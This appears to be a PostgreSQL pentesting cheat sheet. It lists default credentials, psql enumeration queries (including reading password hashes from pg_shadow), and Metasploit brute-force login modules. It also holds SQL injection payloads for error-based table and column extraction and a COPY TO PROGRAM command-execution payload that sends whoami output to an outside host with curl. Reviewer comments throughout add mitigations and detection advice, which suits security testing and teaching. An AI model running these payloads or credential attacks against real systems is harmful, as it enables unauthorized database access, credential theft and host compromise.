
5432 - Pentesting psql

Users

user pass
postgres postgres
postgres password

Connect (local)

# Connect over the local socket as the postgres role (long-form flag, same effect as -U)
psql --username=postgres

Connect (remote)

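# $IP / <host> / <port> / <database> are placeholders; -W forces a password prompt.
# The variable is quoted so an empty or odd value cannot be split into extra arguments.
psql -h "$IP" -U postgres -W postgres
psql -h "$IP" -U postgres -d <database>
# psql's positionals are [DBNAME [USERNAME]]: a second bare word after "postgres" would
# have been taken as the USERNAME and silently overridden -U, so name the database once.
psql -h <host> -p <port> -U postgres -W <database>
\list # List databases
\c <database> # use the database
\d # List tables
\du+ # Get user roles (and which ones are superuser / have login)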

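# Get current user (the role the session runs as)
SELECT user;

# List schemas
SELECT schema_name, schema_owner FROM information_schema.schemata;
\dn+

# List databases
SELECT datname FROM pg_database;

# Read credentials (usernames + pwd hash)
# pg_shadow is readable by superusers only; an application role selecting from it
# (or getting "permission denied" on it) is worth an alert in the server log.
SELECT usename, passwd FROM pg_shadow;

# Get languages (lanacl = USAGE grants, i.e. who may create functions in each language)
SELECT lanname, lanacl FROM pg_language;

# Show installed extensions
# rds.extensions exists only on Amazon RDS and errors elsewhere; the catalog query
# and \dx work on any PostgreSQL.
SHOW rds.extensions;
SELECT extname, extversion FROM pg_extension;
\dx

# Get history of commands executed (psql's client-side history, not server activity)
\s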

Enumeration

nmap

# Version detection plus default scripts, limited to the PostgreSQL port
nmap -p 5432 -sC -sV 10.0.2.5
metasploit - version
# NOTE(review): the module presumably opens a connection as USERNAME with no password to
# elicit the version banner — confirm against the module docs. Server-side, that shows
# up as an authentication attempt for a role that does not exist, which is a usable
# detection hook on a host that should only ever see the application role.
use auxiliary/scanner/postgres/postgres_version
set RHOSTS 10.0.2.5
set USERNAME hacker
unset PASSWORD
options
run
metasploit - login
# Default-credential check: every username/password pair in the wordlists is tried
# (plus an empty password, because BLANK_PASSWORDS is true) until the first success.
# Each miss is a failed-authentication line in the PostgreSQL server log, so a burst of
# them from one client address is the signal to alert on. What this finds is default
# passwords and passwordless pg_hba.conf entries; requiring scram-sha-256 in pg_hba.conf
# and not exposing 5432 beyond the application network removes the finding.
use auxiliary/scanner/postgres/postgres_login
set RHOSTS 10.0.2.5
set BLANK_PASSWORDS true
set DATABASE template1
set STOP_ON_SUCCESS true
set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/postgres_default_userpass.txt
set USER_FILE /usr/share/metasploit-framework/data/wordlists/postgres_default_user.txt
options
run

SQL Injection

basic

-- All of these assume the value is spliced into a single-quoted literal by string
-- concatenation; binding the value as a parameter ($1 / ? / :name) makes them inert.
x' or 1=1 -- x
x' or (1=1 and username='admin') -- x
x' or (1=1 and (SELECT count(*) FROM users) = 1) -- x
-- Stacked form (the ';' starts a second statement): only works where the driver sends
-- multi-statement strings. The failing cast puts the column value into the error text,
-- so database error messages must never be returned to the client.
x'; SELECT CAST(password AS DATE) FROM users; -- x
list of tables
-- Same error-echo channel as above, with json_agg packing every name into one message.
-- Mitigation is the same (parameters, generic error pages); note information_schema only
-- lists objects the current role has some privilege on, so a least-privilege app role
-- also shrinks what this can return.
x'; SELECT cast(cast(json_agg(table_name) as varchar) as boolean) FROM information_schema.tables; -- x
list of columns
-- Column enumeration through the same cast error; mitigations as for the table list.
x'; SELECT cast(cast(json_agg(column_name) as varchar) as boolean) FROM information_schema.columns where table_name = 'users'; -- x
RCE
-- COPY ... TO PROGRAM executes only for superusers or members of pg_execute_server_program,
-- so the application role must hold neither; that single privilege boundary is what
-- separates data theft from host compromise here. The outbound HTTP request originates
-- from the database host, so unexpected egress from that host is the detection point.
x'; copy (SELECT '') to program 'curl http://10.10.14.13?f=`whoami|base64`'-- x